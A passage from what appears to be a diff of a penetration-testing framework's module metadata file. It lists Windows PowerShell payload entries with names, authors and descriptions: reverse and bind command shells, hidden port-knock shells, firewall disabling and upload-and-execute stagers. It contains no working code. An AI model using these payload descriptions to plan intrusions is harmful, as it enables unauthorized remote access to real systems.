(staged).\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/shell/bind_nonx_tcp": { - "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/shell/bind_tcp": { - "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/shell/bind_tcp_rc4": { - "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/shell/bind_tcp_uuid": { - "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/shell/find_tag": { - "name": "Powershell Exec, Windows Command Shell, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/find_tag", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/shell/reverse_ipv6_tcp": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/shell/reverse_nonx_tcp": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/shell/reverse_ord_tcp": { - "name": "Powershell Exec, Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp_allports": { - "name": "Powershell Exec, Windows Command Shell, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp_dns": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp_rc4": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp_uuid": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/shell/reverse_udp": { - "name": "Powershell Exec, Windows Command Shell, Reverse UDP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/shell/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "RageLtMan " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_udp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_udp" - }, - "payload_cmd/windows/powershell/shell_bind_tcp": { - "name": "Powershell Exec, Windows Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/powershell/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/shell_bind_tcp_xpfw": { - "name": "Powershell Exec, Windows Disable Windows ICF, Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/powershell/shell_bind_tcp_xpfw", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Lin0xx " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nDisable the Windows ICF, then listen for a connection and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell_bind_tcp_xpfw", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell_bind_tcp_xpfw", - "staged": false - }, - "payload_cmd/windows/powershell/shell_hidden_bind_tcp": { - "name": "Powershell Exec, Windows Command Shell, Hidden Bind TCP Inline", - "fullname": "payload/cmd/windows/powershell/shell_hidden_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sd", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from certain IP and spawn a command shell.\nThe shellcode will reply with a RST packet if the connections is not\ncoming from the IP defined in AHOST. This way the port will appear\nas \"closed\" helping us to hide the shellcode.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell_hidden_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell_hidden_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/shell_reverse_tcp": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/powershell/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/speak_pwned": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/speak_pwned", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Berend-Jan \"SkyLined\" Wever " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/speak_pwned", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/speak_pwned", - "staged": false - }, - "payload_cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/upexec/bind_hidden_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/upexec/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/upexec/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/upexec/bind_named_pipe": { - "name": "Powershell Exec, Windows Upload/Execute, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/upexec/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_named_pipe", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/upexec/bind_nonx_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": 